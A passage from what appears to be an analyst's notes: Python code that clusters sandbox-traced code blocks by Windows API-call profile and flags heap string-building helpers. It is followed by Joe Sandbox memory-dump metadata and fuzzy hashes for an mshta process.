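    # the ntdll Rtl* spelling and the kernel32 spelling compare equal.
    return name[3:] if name.startswith("Rtl") else name


Profile = Tuple[Tuple[str, int], ...]


def api_profile(block: str) -> Profile:
    """Sorted (api, count) pairs: blocks with the same profile call the same APIs."""
    counts = Counter(normalize_api(c.api) for c in parse_calls(block))
    return tuple(sorted(counts.items()))


def cluster_blocks(blocks: Dict[str, str]) -> Dict[Profile, List[str]]:
    groups: Dict[Profile, List[str]] = {}
    for block_id, text in blocks.items():
        groups.setdefault(api_profile(text), []).append(block_id)
    return groups


def is_heap_string_builder(block: str) -> bool:
    """Heuristic of my own, not the report's: two length measurements, a heap
    allocation reached through a subcall, a copy into the new buffer and then a
    second copy or a concatenation. That is the shape of a helper that joins two
    strings into a freshly allocated heap buffer."""
    calls = parse_calls(block)
    names = [normalize_api(c.api) for c in calls]
    alloc_via_sub = any(c.api == "RtlAllocateHeap" and c.callee for c in calls)
    return (names.count("lstrlen") >= 2 and alloc_via_sub
            and "lstrcpy" in names and ("lstrcat" in names or "memcpy" in names))


if __name__ == "__main__":
    for profile, ids in cluster_blocks(SAMPLE_BLOCKS).items():
        print(ids, "->", " ".join(f"{n}x{k}" for n, k in profile))
    for block_id, text in SAMPLE_BLOCKS.items():
        print(block_id, "heap string builder:", is_heap_string_builder(text))
```

                                          Grouping by API profile reproduces the report's pairing: the two blocks sharing ID 74227042 fall into one cluster, while the first block (memcpy in place of lstrcat) stands alone even though the heuristic flags all three as the same kind of string-building helper.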

                                          Memory Dump Source
                                          • Source File: 00000011.00000003.600379413.00000273CE000000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000273CE000000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_3_273ce000000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                          • Instruction ID: f654f67ee6e742abf579e5fc2dd81804b08288b2531d675a54f79a349c366c5f
                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                          • Instruction Fuzzy Hash: BF9002044D941655E41551920C4926D50816388251FD44886441AB0544D84D03963193
                                          Uniqueness

                                          Uniqueness Score: -1.00%
